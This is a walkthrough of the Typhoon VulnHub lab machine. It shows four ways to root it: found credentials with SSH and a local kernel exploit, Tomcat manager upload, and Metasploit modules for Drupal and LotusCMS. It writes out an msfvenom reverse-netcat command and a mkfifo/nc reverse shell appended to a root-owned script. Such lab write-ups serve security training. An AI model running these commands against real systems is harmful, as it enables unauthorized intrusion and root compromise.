Typhoon: Vulnhub Walkthrough

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
Flag: root-flag
Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:
Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.

We found our target IP –>
Our next motive is to scan the target IP with nmap.
nmap -A
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb). It will display a link of 2 Credentials. Click on it.

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.
Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123
ssh typhoon@
Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.
Booyeah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.  

Method 2
Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.
Let’s Begin with the Walkthrough!!
Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default credentials for Tomcat Server Login.
Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

 Moving on!! We need to create a bash code using Msfvenom:
msfvenom –p cmd/unix/reverse_netcat lhost= lport=1234 R
After that, append the above generated malicious code in the script.sh file.

echo “mkfifo /tmp/vvwjo; nc 1234 0
/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.
Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

3rd Method:Exploiting Drupal CMS
Unfortunately on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.


It was wonderful to observe that there was two CMS  as highlighted in the below image.

On exploring /Drupal in the web browser, it put up the following web page which was associated to Drupal cms.

Without wasting must time, we chase towards metasploit and run following module to exploit Drupal cms.
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
Booom!! It was terrific moment to see meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1st method.

4th Method: Exploiting Lotus CMS
Scroll up and kindly notice the result which we have obtain from the dirb scan, there we had found two CMS. We had already exploit Drupal, now let’s go for next CMS and try to exploit it, if possible
So on exploring /cms in the web browser, it put up the following web page which was associated to Lotus cms.

Without wasting must time, again we chase towards metasploit and run following module to exploit lotus cms.

use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have own another meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1st method.


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